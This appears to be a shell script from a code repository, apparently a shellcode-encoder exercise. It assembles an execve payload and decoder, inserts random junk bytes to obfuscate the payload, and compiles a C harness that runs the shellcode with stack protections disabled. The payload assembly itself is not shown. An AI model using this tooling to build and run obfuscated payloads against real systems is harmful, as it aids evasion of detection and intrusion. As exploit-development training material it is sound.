You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
70 lines
1.8 KiB
70 lines
1.8 KiB
#!/usr/bin/env sh
|
|
#
|
|
# This script will generate shellcode.c and compile it
|
|
#
|
|
|
|
#
|
|
# Compile the payload and decoder
|
|
#
|
|
echo " [+] Compiling the payload and decoder ..."
|
|
SPAYLOAD=./execve-stack
|
|
nasm -f elf32 -o $SPAYLOAD.o $SPAYLOAD.nasm && ld -m elf_i386 -o $SPAYLOAD $SPAYLOAD.o
|
|
SDECODER=./decoder
|
|
nasm -f elf32 -o $SDECODER.o $SDECODER.nasm && ld -m elf_i386 -o $SDECODER $SDECODER.o
|
|
|
|
echo " [+] Preparing decoder shellcode ..."
|
|
DECODERSHELLCODE=$(echo -n "\""; for i in $(objdump -d $SDECODER -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done)
|
|
|
|
#
|
|
# Encode the payload shellcode
|
|
#
|
|
echo " [+] Encoding the payload shellcode ..."
|
|
#
|
|
# $ echo -en '\x37\xFA\xD6\x3F' |ndisasm -b32 -
|
|
# 00000000 37 aaa
|
|
# 00000001 FA cli
|
|
# 00000002 D6 salc
|
|
# 00000003 3F aas
|
|
#
|
|
|
|
# Permutation code
|
|
garbage=('\x37' '\xFA' '\xD6' '\x3F');
|
|
#ENCPSHELLCODE=$(for i in $(objdump -d $SPAYLOAD |grep "^ " |cut -f2); do echo -n '\x'$i; echo -n ${garbage[$[$(shuf --random-source=/dev/urandom -z -i 999-999999 -n1)%4]]}; done; echo -n "\xAF\"")
|
|
ENCPSHELLCODE=$(for i in $(objdump -d $SPAYLOAD |grep "^ " |cut -f2); do echo -n '\x'$i; echo -n ${garbage[$[$(od -A n -N 2 -t u2 /dev/urandom)%4]]}; done; echo -n "\xAF\"")
|
|
|
|
|
|
FULL_SHELLCODE=${DECODERSHELLCODE}${ENCPSHELLCODE}
|
|
|
|
#
|
|
# Generate shellcode.c
|
|
#
|
|
echo " [+] Generating shellcode.c file ..."
|
|
cat > shellcode.c << EOF
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
unsigned char code[] = \
|
|
$FULL_SHELLCODE;
|
|
|
|
main()
|
|
{
|
|
printf("Shellcode Length: %d\n", strlen(code));
|
|
int (*ret)() = (int(*)())code;
|
|
ret();
|
|
}
|
|
EOF
|
|
|
|
#
|
|
# Compile C code with GCC
|
|
#
|
|
echo " [+] Compiling shellcode.c with GCC ..."
|
|
gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
|
|
|
|
ls -la ./shellcode
|
|
|
|
#
|
|
# Cleanup
|
|
#
|
|
rm ./$SPAYLOAD ./$SDECODER ./$SPAYLOAD.o ./$SDECODER.o
|
|
|